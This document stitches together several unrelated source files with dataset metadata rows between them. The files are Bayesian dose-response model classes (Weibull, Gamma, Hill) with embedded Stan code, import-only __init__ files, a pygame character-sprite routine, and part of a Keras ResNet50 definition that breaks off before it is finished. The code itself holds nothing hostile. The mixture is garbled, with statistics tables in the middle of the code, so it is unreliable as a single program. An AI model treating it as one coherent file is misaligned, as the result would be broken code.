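    risk = a + (1.0 - a) * (1.0 - np.exp(-b * bmd - c * bmd ** 2))
    assert abs((risk - a) / (1.0 - a) - bmr) < 1e-12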
class Weibull(Dichotomous):
PARAMETERS = ('a', 'b', 'c')
STAN_MODEL = """
data {
int<lower=0> len; // number of dose groups
int<lower=0> y[len]; // observed number of cases
int<lower=0> n[len]; // number of subjects
real<lower=0> dnorm[len]; // dose levels
real pwr_lbound; // restraint value
real p_a[2]; // prior for a
real p_b[2]; // prior for b
real p_c[2]; // prior for c
}
parameters {
real <lower=0, upper=1> a;
real <lower=pwr_lbound> b;
real <lower=0> c;
}
model {
a ~ uniform (p_a[1], p_a[2]);
b ~ uniform (p_b[1], p_b[2]);
c ~ uniform (p_c[1], p_c[2]);
for (i in 1:len)
y[i] ~ binomial(n[i], a+(1-a)*(1-exp(-c*(dnorm[i])^b)));
}
"""
LATEX_EQUATION = r'$f(dose) = a + (1 - a) \times (1 - e^{-c \times dose^{b}})$' # noqa
def get_priors(self):
return {
'p_a': [0, 1],
'p_b': [0, 15],
'p_c': [0, 50],
}
def get_settings(self):
pwr_lbound = self.kwargs.get('pwr_lbound', 1.)
if pwr_lbound < 0. or pwr_lbound > 1.:
raise ValueError('Invalid pwr_lbound: {}'.format(pwr_lbound))
return {
'pwr_lbound': pwr_lbound,
}
def get_predicted_response_vector(self):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
doses = self.data['dnorm']
ys = self.data['y']
ns = self.data['n']
predicted = np.zeros(a.size, dtype=np.float64)
observed = np.zeros(a.size, dtype=np.float64)
for i in range(a.size):
resp = np.array(a[i]+(1-a[i])*(1-np.exp(-c[i]*(doses**b[i]))))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
y_post_pred = np.random.binomial(ns, resp)
predicted[i] = -2. * self.likelihood(resp, y_post_pred, ns)
observed[i] = -2. * self.likelihood(resp, ys, ns)
return predicted, observed
def get_loglikelihood(self, samples):
a = samples[0, :]
b = samples[1, :]
c = samples[2, :]
doses = self.data['dnorm']
ns = self.data['n']
ys = self.data['y']
predicted = np.zeros(a.size, dtype=np.float64)
for i in range(a.size):
resp = np.array(a[i]+(1-a[i])*(1-np.exp(-c[i]*(doses**b[i]))))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
predicted[i] = self.likelihood(resp, ys, ns)
return predicted
def get_response_values(self, x, **kw):
return kw['a'] + (1 - kw['a']) * (1 - np.exp(- kw['c'] * (x**kw['b'])))
def extra_risk(self, bmr):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
return np.exp(np.log(np.log((1-bmr*(1-a)-a)/(1-a))/(-c))/b)
def added_risk(self, bmr):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
return np.exp(np.log(np.log((1-bmr-a)/(1-a))/(-c))/b)
def risk_at_dose(self, dose):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
return a+(1-a)*(1-np.exp(-c*(dose**b)))
class Gamma(Dichotomous):
PARAMETERS = ('a', 'b', 'c')
STAN_MODEL = """
data {
int<lower=0> len; // number of dose groups
int<lower=0> y[len]; // observed number of cases
int<lower=0> n[len]; // number of subjects
real<lower=0> dnorm[len]; // dose levels
real pwr_lbound; // restraint value
real p_a[2]; // prior for a
real p_b[2]; // prior for b
real p_c[2]; // prior for c
}
parameters {
real <lower=0,upper=1> a;
real <lower=pwr_lbound> b;
real <lower=0> c;
}
model {
a ~ uniform (p_a[1], p_a[2]);
b ~ uniform (p_b[1], p_b[2]);
c ~ uniform (p_c[1], p_c[2]);
for (i in 1:len)
y[i] ~ binomial(n[i],a+(1-a)*gamma_cdf(c*dnorm[i],b,1));
}
"""
LATEX_EQUATION = r'$f(dose) = a + (1 - a) \times CumGamma(c \times dose, b)$' # noqa
def get_priors(self):
return {
'p_a': [0, 1],
'p_b': [0, 15],
'p_c': [0, 100],
}
def get_settings(self):
pwr_lbound = self.kwargs.get('pwr_lbound', 1.)
if pwr_lbound < 0. or pwr_lbound > 1.:
raise ValueError('Invalid pwr_lbound: {}'.format(pwr_lbound))
return {
'pwr_lbound': pwr_lbound,
}
def get_predicted_response_vector(self):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
doses = self.data['dnorm']
ys = self.data['y']
ns = self.data['n']
predicted = np.zeros(a.size, dtype=np.float64)
observed = np.zeros(a.size, dtype=np.float64)
for i in range(a.size):
resp = np.array(a[i] + (1 - a[i]) * stats.gamma.cdf(c[i] * doses, b[i]))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
y_post_pred = np.random.binomial(ns, resp)
predicted[i] = -2. * self.likelihood(resp, y_post_pred, ns)
observed[i] = -2. * self.likelihood(resp, ys, ns)
return predicted, observed
def get_loglikelihood(self, samples):
a = samples[0, :]
b = samples[1, :]
c = samples[2, :]
doses = self.data['dnorm']
ns = self.data['n']
ys = self.data['y']
predicted = np.zeros(a.size, dtype=np.float64)
for i in range(a.size):
resp = np.array(a[i] + (1 - a[i]) * stats.gamma.cdf(c[i] * doses, b[i]))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
predicted[i] = self.likelihood(resp, ys, ns)
return predicted
def get_response_values(self, x, **kw):
return kw['a'] + (1 - kw['a']) * stats.gamma.cdf(kw['c'] * x, kw['b'])
def extra_risk(self, bmr):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
return stats.gamma.ppf(bmr, b) / c
def added_risk(self, bmr):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
return stats.gamma.ppf(bmr / (1 - a), b) / c
def risk_at_dose(self, dose):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
return np.array(a + (1 - a) * stats.gamma.cdf(c * dose, b))
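# Illustrative check (added; not part of the original module): `extra_risk`
# inverts the cumulative-gamma link via stats.gamma.ppf, so applying the
# response function at the returned dose recovers bmr. Values are arbitrary.
def _check_gamma_extra_risk(a=0.05, b=1.5, c=2.0, bmr=0.1):
    bmd = stats.gamma.ppf(bmr, b) / c
    risk = a + (1.0 - a) * stats.gamma.cdf(c * bmd, b)
    assert abs((risk - a) / (1.0 - a) - bmr) < 1e-12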
class DichotomousHill(Dichotomous):
RESAMPLE_MAX_THRESHOLD = 0.05
PARAMETERS = ('a', 'b', 'c', 'g')
STAN_MODEL = """
data {
int<lower=0> len; // number of dose groups
int<lower=0> y[len]; // observed number of cases
int<lower=0> n[len]; // number of subjects
real<lower=0> dno0norm[len]; // dose levels
real pwr_lbound; // restraint value
real p_a[2]; // prior for a
real p_b[2]; // prior for b
real p_c[2]; // prior for c
real p_g[2]; // prior for g
}
parameters {
real <lower=0, upper=1> a;
real <lower=pwr_lbound> b;
real c;
real <lower=0, upper=1> g;
}
model {
a ~ uniform (p_a[1], p_a[2]);
b ~ uniform (p_b[1], p_b[2]);
c ~ uniform (p_c[1], p_c[2]);
g ~ uniform (p_g[1], p_g[2]);
for (i in 1:len)
y[i] ~ binomial(n[i], a * g + (a - a * g)/(1 + exp(-c - b * log(dno0norm[i]))));
}
"""
LATEX_EQUATION = r'$f(dose) = a \times g + \frac{a - a \times g}{1 + e^{-c - b \times \log(dose)}}$' # noqa
def get_priors(self):
return {
'p_a': [0, 1],
'p_b': [0, 15],
'p_c': [-5, 15],
'p_g': [0, 1],
}
def get_settings(self):
pwr_lbound = self.kwargs.get('pwr_lbound', 1.)
if pwr_lbound < 0. or pwr_lbound > 1.:
raise ValueError('Invalid pwr_lbound: {}'.format(pwr_lbound))
return {
'pwr_lbound': pwr_lbound,
}
def get_predicted_response_vector(self):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
g = self.parameters['g']
doses = self.data['dno0norm']
ys = self.data['y']
ns = self.data['n']
predicted = np.zeros(a.size, dtype=np.float64)
observed = np.zeros(a.size, dtype=np.float64)
for i in range(a.size):
resp = a[i] * g[i] + (a[i] - a[i] * g[i]) / (1 + np.exp(-c[i] - b[i] * np.log(doses)))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
y_post_pred = np.random.binomial(ns, resp)
predicted[i] = -2. * self.likelihood(resp, y_post_pred, ns)
observed[i] = -2. * self.likelihood(resp, ys, ns)
return predicted, observed
def get_loglikelihood(self, samples):
a = samples[0, :]
b = samples[1, :]
c = samples[2, :]
g = samples[3, :]
doses = self.data['dno0norm']
ns = self.data['n']
ys = self.data['y']
predicted = np.zeros(a.size, dtype=np.float64)
for i in range(a.size):
resp = a[i] * g[i] + (a[i] - a[i] * g[i]) / (1 + np.exp(-c[i] - b[i] * np.log(doses)))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
predicted[i] = self.likelihood(resp, ys, ns)
return predicted
def get_response_values(self, x, **kw):
if x == 0:
x = self.ZEROISH
return kw['a'] * kw['g'] + \
(kw['a'] - kw['a'] * kw['g']) / \
(1 + np.exp(-kw['c'] - kw['b'] * np.log(x)))
def extra_risk(self, bmr):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
g = self.parameters['g']
return np.exp((np.log(
(bmr - a + a * g - bmr * a * g) /
(bmr * (a * g - 1.))) + c) / (-b))
def added_risk(self, bmr):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
g = self.parameters['g']
return np.exp((np.log((bmr - a + a * g) / (-bmr)) + c) / (-b))
def risk_at_dose(self, dose):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
g = self.parameters['g']
return a * g + (a - a * g) / (1 + np.exp(-c - b * np.log(dose)))
| 31.937819 | 112 | 0.486802 | 4,382 | 31,331 | 3.395938 | 0.036741 | 0.091257 | 0.033062 | 0.038707 | 0.924871 | 0.915261 | 0.902224 | 0.901552 | 0.88744 | 0.885156 | 0 | 0.026354 | 0.342377 | 31,331 | 980 | 113 | 31.970408 | 0.695884 | 0.005362 | 0 | 0.804266 | 0 | 0.02133 | 0.264871 | 0.011171 | 0 | 0 | 0 | 0.00102 | 0 | 1 | 0.095358 | false | 0 | 0.005019 | 0.02133 | 0.239649 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e720b041a9849d792b935dc307f7063ba052273c | 183 | py | Python | codes/globo_videos_cuts/core/tests/views/__init__.py | lariodiniz/teste_meta | 3bf043df3ee76871d68a3f8aea7c3ecd53765fec | [
"MIT"
] | null | null | null | codes/globo_videos_cuts/core/tests/views/__init__.py | lariodiniz/teste_meta | 3bf043df3ee76871d68a3f8aea7c3ecd53765fec | [
"MIT"
] | null | null | null | codes/globo_videos_cuts/core/tests/views/__init__.py | lariodiniz/teste_meta | 3bf043df3ee76871d68a3f8aea7c3ecd53765fec | [
"MIT"
] | null | null | null | from .programs_view_test_case import ProgramsViewTestCase
from .cutting_job_view_test_case import CuttingJobsViewTestCase
from .globo_play_view_test_case import GloboPlayViewTestCase
| 45.75 | 63 | 0.918033 | 23 | 183 | 6.826087 | 0.565217 | 0.152866 | 0.229299 | 0.343949 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.065574 | 183 | 3 | 64 | 61 | 0.918129 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
e7da21a0923f8ab1d8b9acc280daeaaf3ed08990 | 94 | py | Python | netforce_support/netforce_support/models/__init__.py | nfco/netforce | 35252eecd0a6633ab9d82162e9e3ff57d4da029a | [
"MIT"
] | 27 | 2015-09-30T23:53:30.000Z | 2021-06-07T04:56:25.000Z | netforce_support/netforce_support/models/__init__.py | nfco/netforce | 35252eecd0a6633ab9d82162e9e3ff57d4da029a | [
"MIT"
] | 191 | 2015-10-08T11:46:30.000Z | 2019-11-14T02:24:36.000Z | netforce_support/netforce_support/models/__init__.py | nfco/netforce | 35252eecd0a6633ab9d82162e9e3ff57d4da029a | [
"MIT"
] | 32 | 2015-10-01T03:59:43.000Z | 2022-01-13T07:31:05.000Z | from . import issue
from . import issue_type
from . import report_issue
from . import message
| 18.8 | 26 | 0.787234 | 14 | 94 | 5.142857 | 0.428571 | 0.555556 | 0.416667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.170213 | 94 | 4 | 27 | 23.5 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
99b052f6145f8b03d414080781a87542c2e77237 | 45 | py | Python | lib/lib/__init__.py | trouleau/noisy-hawkes-cumulants | a183a766807a714ca4338f09249d4ddc4e9a11a7 | [
"MIT"
] | 1 | 2021-07-22T05:16:13.000Z | 2021-07-22T05:16:13.000Z | lib/lib/__init__.py | trouleau/noisy-hawkes-cumulants | a183a766807a714ca4338f09249d4ddc4e9a11a7 | [
"MIT"
] | null | null | null | lib/lib/__init__.py | trouleau/noisy-hawkes-cumulants | a183a766807a714ca4338f09249d4ddc4e9a11a7 | [
"MIT"
] | null | null | null | from . import simulation
from . import utils
| 15 | 24 | 0.777778 | 6 | 45 | 5.833333 | 0.666667 | 0.571429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.177778 | 45 | 2 | 25 | 22.5 | 0.945946 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
99b66d943379fba5eec61285f6179516eb2592d3 | 4,613 | py | Python | centre.py | SkYNewZ/1DEV | 9f75115afae45c1f2b19f838adf8f6eacdd3e1d8 | [
"MIT"
] | null | null | null | centre.py | SkYNewZ/1DEV | 9f75115afae45c1f2b19f838adf8f6eacdd3e1d8 | [
"MIT"
] | null | null | null | centre.py | SkYNewZ/1DEV | 9f75115afae45c1f2b19f838adf8f6eacdd3e1d8 | [
"MIT"
] | null | null | null | # coding=utf-8
import pygame, sys
from globales import *
from pygame.locals import *
def afficher_perso(direction, locomotion, position, modele_voiture):
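# Parameter conventions, inferred from the branches below: direction is
# 1=up, 2=down, 3=left, 4=right; locomotion is 1=on foot, 2=by car;
# position is the walk-cycle frame (1-12); modele_voiture indexes the
# car sprite table.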
coord_centre_perso_horizontal = [1500//2-20, 825//2-65]
coord_centre_perso_vertical = [1500//2-30, 825//2-55]
# coordinates of (map center)-x/2; (map center)-y/2
# car
if locomotion == 2:
# moving up
if direction == 1:
fenetre.blit(tab_voitures[modele_voiture][0], ((1500//2)-35, (825//2-35)-67))
# moving down
if direction == 2:
fenetre.blit(tab_voitures[modele_voiture][1], ((1500//2)-35, (825//2-35)-67))
# left
if direction == 3:
fenetre.blit(tab_voitures[modele_voiture][2], ((1500//2)-67, (825//2-35)-35))
# right
if direction == 4:
fenetre.blit(tab_voitures[modele_voiture][3], ((1500//2)-67, (825//2-35)-35))
## on foot
if locomotion == 1:
# left
if direction == 3:
if position == 1 or position == 2:
fenetre.blit(tab_perso[armed[0]][18], (coord_centre_perso_horizontal[0], coord_centre_perso_horizontal[1]))
if position == 3 or position == 4:
fenetre.blit(tab_perso[armed[0]][19], (coord_centre_perso_horizontal[0], coord_centre_perso_horizontal[1]))
if position == 5 or position == 6:
fenetre.blit(tab_perso[armed[0]][20], (coord_centre_perso_horizontal[0], coord_centre_perso_horizontal[1]))
if position == 7 or position == 8:
fenetre.blit(tab_perso[armed[0]][21], (coord_centre_perso_horizontal[0], coord_centre_perso_horizontal[1]))
if position == 9 or position == 10:
fenetre.blit(tab_perso[armed[0]][22], (coord_centre_perso_horizontal[0], coord_centre_perso_horizontal[1]))
if position == 11 or position == 12:
fenetre.blit(tab_perso[armed[0]][23], (coord_centre_perso_horizontal[0], coord_centre_perso_horizontal[1]))
# right
if direction == 4:
if position == 1 or position == 2:
fenetre.blit(tab_perso[armed[0]][12], (coord_centre_perso_horizontal[0], coord_centre_perso_horizontal[1]))
if position == 3 or position == 4:
fenetre.blit(tab_perso[armed[0]][13], (coord_centre_perso_horizontal[0], coord_centre_perso_horizontal[1]))
if position == 5 or position == 6:
fenetre.blit(tab_perso[armed[0]][14], (coord_centre_perso_horizontal[0], coord_centre_perso_horizontal[1]))
if position == 7 or position == 8:
fenetre.blit(tab_perso[armed[0]][15], (coord_centre_perso_horizontal[0], coord_centre_perso_horizontal[1]))
if position == 9 or position == 10:
fenetre.blit(tab_perso[armed[0]][16], (coord_centre_perso_horizontal[0], coord_centre_perso_horizontal[1]))
if position == 11 or position == 12:
fenetre.blit(tab_perso[armed[0]][17], (coord_centre_perso_horizontal[0], coord_centre_perso_horizontal[1]))
# up
if direction == 1:
if position == 1 or position == 2:
fenetre.blit(tab_perso[armed[0]][6], (coord_centre_perso_vertical[0], coord_centre_perso_vertical[1]))
if position == 3 or position == 4:
fenetre.blit(tab_perso[armed[0]][7], (coord_centre_perso_vertical[0], coord_centre_perso_vertical[1]))
if position == 5 or position == 6:
fenetre.blit(tab_perso[armed[0]][8], (coord_centre_perso_vertical[0], coord_centre_perso_vertical[1]))
if position == 7 or position == 8:
fenetre.blit(tab_perso[armed[0]][9], (coord_centre_perso_vertical[0], coord_centre_perso_vertical[1]))
if position == 9 or position == 10:
fenetre.blit(tab_perso[armed[0]][10], (coord_centre_perso_vertical[0], coord_centre_perso_vertical[1]))
if position == 11 or position == 12:
fenetre.blit(tab_perso[armed[0]][11], (coord_centre_perso_vertical[0], coord_centre_perso_vertical[1]))
# down
if direction == 2:
if position == 1 or position == 2:
fenetre.blit(tab_perso[armed[0]][0], (coord_centre_perso_vertical[0], coord_centre_perso_vertical[1]))
if position == 3 or position == 4:
fenetre.blit(tab_perso[armed[0]][1], (coord_centre_perso_vertical[0], coord_centre_perso_vertical[1]))
if position == 5 or position == 6:
fenetre.blit(tab_perso[armed[0]][2], (coord_centre_perso_vertical[0], coord_centre_perso_vertical[1]))
if position == 7 or position == 8:
fenetre.blit(tab_perso[armed[0]][3], (coord_centre_perso_vertical[0], coord_centre_perso_vertical[1]))
if position == 9 or position == 10:
fenetre.blit(tab_perso[armed[0]][4], (coord_centre_perso_vertical[0], coord_centre_perso_vertical[1]))
if position == 11 or position == 12:
fenetre.blit(tab_perso[armed[0]][5], (coord_centre_perso_vertical[0], coord_centre_perso_vertical[1]))
#DEBUG
# pygame.draw.circle(fenetre, (255, 0,0), (1500//2, 825//2-35), 5) | 46.59596 | 111 | 0.710817 | 718 | 4,613 | 4.310585 | 0.107242 | 0.177706 | 0.258481 | 0.210016 | 0.836511 | 0.836187 | 0.790953 | 0.771567 | 0.771567 | 0.771567 | 0 | 0.0725 | 0.132885 | 4,613 | 99 | 112 | 46.59596 | 0.70125 | 0.044006 | 0 | 0.470588 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014706 | false | 0 | 0.044118 | 0 | 0.058824 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
99dc8febb7d61c9b3364ee9bbdf5c0a5557eff22 | 11,974 | py | Python | docs/examples/use_cases/tensorflow/resnet-n/resnet_model.py | cyyever/DALI | e2b2d5a061da605e3e9e681017a7b2d53fe41a62 | [
"ECL-2.0",
"Apache-2.0"
] | 3,967 | 2018-06-19T04:39:09.000Z | 2022-03-31T10:57:53.000Z | docs/examples/use_cases/tensorflow/resnet-n/resnet_model.py | cyyever/DALI | e2b2d5a061da605e3e9e681017a7b2d53fe41a62 | [
"ECL-2.0",
"Apache-2.0"
] | 3,494 | 2018-06-21T07:09:58.000Z | 2022-03-31T19:44:51.000Z | docs/examples/use_cases/tensorflow/resnet-n/resnet_model.py | cyyever/DALI | e2b2d5a061da605e3e9e681017a7b2d53fe41a62 | [
"ECL-2.0",
"Apache-2.0"
] | 531 | 2018-06-19T23:53:10.000Z | 2022-03-30T08:35:59.000Z | import tensorflow as tf
from tensorflow.keras import backend
from tensorflow.keras import initializers
from tensorflow.keras import models
from tensorflow.keras import regularizers
from nvutils import image_processing
layers = tf.keras.layers
L2_WEIGHT_DECAY = 1e-4
BATCH_NORM_DECAY = 0.9
BATCH_NORM_EPSILON = 1e-5
def _gen_l2_regularizer(use_l2_regularizer=True):
return regularizers.l2(L2_WEIGHT_DECAY) if use_l2_regularizer else None
def identity_block(input_tensor,
kernel_size,
filters,
stage,
block,
use_l2_regularizer=True):
"""The identity block is the block that has no conv layer at shortcut.
Args:
input_tensor: input tensor
kernel_size: default 3, the kernel size of middle conv layer at main path
filters: list of integers, the filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
use_l2_regularizer: whether to use L2 regularizer on Conv layer.
Returns:
Output tensor for the block.
"""
filters1, filters2, filters3 = filters
if backend.image_data_format() == 'channels_last':
bn_axis = 3
else:
bn_axis = 1
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = layers.Conv2D(
filters1, (1, 1),
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name=conv_name_base + '2a')(
input_tensor)
x = layers.BatchNormalization(
axis=bn_axis,
momentum=BATCH_NORM_DECAY,
epsilon=BATCH_NORM_EPSILON,
name=bn_name_base + '2a')(
x)
x = layers.Activation('relu')(x)
x = layers.Conv2D(
filters2,
kernel_size,
padding='same',
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name=conv_name_base + '2b')(
x)
x = layers.BatchNormalization(
axis=bn_axis,
momentum=BATCH_NORM_DECAY,
epsilon=BATCH_NORM_EPSILON,
name=bn_name_base + '2b')(
x)
x = layers.Activation('relu')(x)
x = layers.Conv2D(
filters3, (1, 1),
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name=conv_name_base + '2c')(
x)
x = layers.BatchNormalization(
axis=bn_axis,
momentum=BATCH_NORM_DECAY,
epsilon=BATCH_NORM_EPSILON,
name=bn_name_base + '2c')(
x)
x = layers.add([x, input_tensor])
x = layers.Activation('relu')(x)
return x
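# Minimal usage sketch (added for illustration; not part of the original
# file): an identity block must preserve the input shape, since filters3
# has to match the channel count of input_tensor for the residual add.
def _identity_block_shape_check():
    inputs = layers.Input(shape=(56, 56, 256))
    outputs = identity_block(inputs, 3, [64, 64, 256], stage=2, block='zz')
    assert outputs.shape[1:] == inputs.shape[1:]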
def conv_block(input_tensor,
kernel_size,
filters,
stage,
block,
strides=(2, 2),
use_l2_regularizer=True):
"""A block that has a conv layer at shortcut.
Note that from stage 3,
the second conv layer at main path is with strides=(2, 2)
And the shortcut should have strides=(2, 2) as well
Args:
input_tensor: input tensor
kernel_size: default 3, the kernel size of middle conv layer at main path
filters: list of integers, the filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
strides: Strides for the second conv layer in the block.
use_l2_regularizer: whether to use L2 regularizer on Conv layer.
Returns:
Output tensor for the block.
"""
filters1, filters2, filters3 = filters
if backend.image_data_format() == 'channels_last':
bn_axis = 3
else:
bn_axis = 1
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = layers.Conv2D(
filters1, (1, 1),
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name=conv_name_base + '2a')(
input_tensor)
x = layers.BatchNormalization(
axis=bn_axis,
momentum=BATCH_NORM_DECAY,
epsilon=BATCH_NORM_EPSILON,
name=bn_name_base + '2a')(
x)
x = layers.Activation('relu')(x)
x = layers.Conv2D(
filters2,
kernel_size,
strides=strides,
padding='same',
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name=conv_name_base + '2b')(
x)
x = layers.BatchNormalization(
axis=bn_axis,
momentum=BATCH_NORM_DECAY,
epsilon=BATCH_NORM_EPSILON,
name=bn_name_base + '2b')(
x)
x = layers.Activation('relu')(x)
x = layers.Conv2D(
filters3, (1, 1),
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name=conv_name_base + '2c')(
x)
x = layers.BatchNormalization(
axis=bn_axis,
momentum=BATCH_NORM_DECAY,
epsilon=BATCH_NORM_EPSILON,
name=bn_name_base + '2c')(
x)
shortcut = layers.Conv2D(
filters3, (1, 1),
strides=strides,
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name=conv_name_base + '1')(
input_tensor)
shortcut = layers.BatchNormalization(
axis=bn_axis,
momentum=BATCH_NORM_DECAY,
epsilon=BATCH_NORM_EPSILON,
name=bn_name_base + '1')(
shortcut)
x = layers.add([x, shortcut])
x = layers.Activation('relu')(x)
return x
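# Illustrative sketch (added; not part of the original file): with the
# default strides=(2, 2), a conv block halves the spatial dimensions and
# projects the shortcut to the new channel count.
def _conv_block_shape_check():
    inputs = layers.Input(shape=(56, 56, 256))
    outputs = conv_block(inputs, 3, [128, 128, 512], stage=3, block='zz')
    assert outputs.shape[1:].as_list() == [28, 28, 512]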
def resnet50(num_classes,
batch_size=None,
use_l2_regularizer=True,
rescale_inputs=False):
"""Instantiates the ResNet50 architecture.
Args:
num_classes: `int` number of classes for image classification.
batch_size: Size of the batches for each step.
use_l2_regularizer: whether to use L2 regularizer on Conv/Dense layer.
rescale_inputs: whether to rescale inputs from 0 to 1.
Returns:
A Keras model instance.
"""
input_shape = (224, 224, 3)
img_input = layers.Input(shape=input_shape, batch_size=batch_size)
if rescale_inputs:
# Hub image modules expect inputs in the range [0, 1]. This rescales these
# inputs to the range expected by the trained model.
x = layers.Lambda(
lambda x: x * 255.0 - backend.constant(
image_processing.CHANNEL_MEANS,
shape=[1, 1, 3],
dtype=x.dtype),
name='rescale')(
img_input)
else:
x = img_input
if backend.image_data_format() == 'channels_first':
x = layers.Lambda(
lambda x: backend.permute_dimensions(x, (0, 3, 1, 2)),
name='transpose')(x)
bn_axis = 1
else: # channels_last
bn_axis = 3
x = layers.ZeroPadding2D(padding=(3, 3), name='conv1_pad')(x)
x = layers.Conv2D(
64, (7, 7),
strides=(2, 2),
padding='valid',
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name='conv1')(
x)
x = layers.BatchNormalization(
axis=bn_axis,
momentum=BATCH_NORM_DECAY,
epsilon=BATCH_NORM_EPSILON,
name='bn_conv1')(
x)
x = layers.Activation('relu')(x)
x = layers.MaxPooling2D((3, 3), strides=(2, 2), padding='same')(x)
x = conv_block(
x,
3, [64, 64, 256],
stage=2,
block='a',
strides=(1, 1),
use_l2_regularizer=use_l2_regularizer)
x = identity_block(
x,
3, [64, 64, 256],
stage=2,
block='b',
use_l2_regularizer=use_l2_regularizer)
x = identity_block(
x,
3, [64, 64, 256],
stage=2,
block='c',
use_l2_regularizer=use_l2_regularizer)
x = conv_block(
x,
3, [128, 128, 512],
stage=3,
block='a',
use_l2_regularizer=use_l2_regularizer)
x = identity_block(
x,
3, [128, 128, 512],
stage=3,
block='b',
use_l2_regularizer=use_l2_regularizer)
x = identity_block(
x,
3, [128, 128, 512],
stage=3,
block='c',
use_l2_regularizer=use_l2_regularizer)
x = identity_block(
x,
3, [128, 128, 512],
stage=3,
block='d',
use_l2_regularizer=use_l2_regularizer)
x = conv_block(
x,
3, [256, 256, 1024],
stage=4,
block='a',
use_l2_regularizer=use_l2_regularizer)
x = identity_block(
x,
3, [256, 256, 1024],
stage=4,
block='b',
use_l2_regularizer=use_l2_regularizer)
x = identity_block(
x,
3, [256, 256, 1024],
stage=4,
block='c',
use_l2_regularizer=use_l2_regularizer)
x = identity_block(
x,
3, [256, 256, 1024],
stage=4,
block='d',
use_l2_regularizer=use_l2_regularizer)
x = identity_block(
x,
3, [256, 256, 1024],
stage=4,
block='e',
use_l2_regularizer=use_l2_regularizer)
x = identity_block(
x,
3, [256, 256, 1024],
stage=4,
block='f',
use_l2_regularizer=use_l2_regularizer)
x = conv_block(
x,
3, [512, 512, 2048],
stage=5,
block='a',
use_l2_regularizer=use_l2_regularizer)
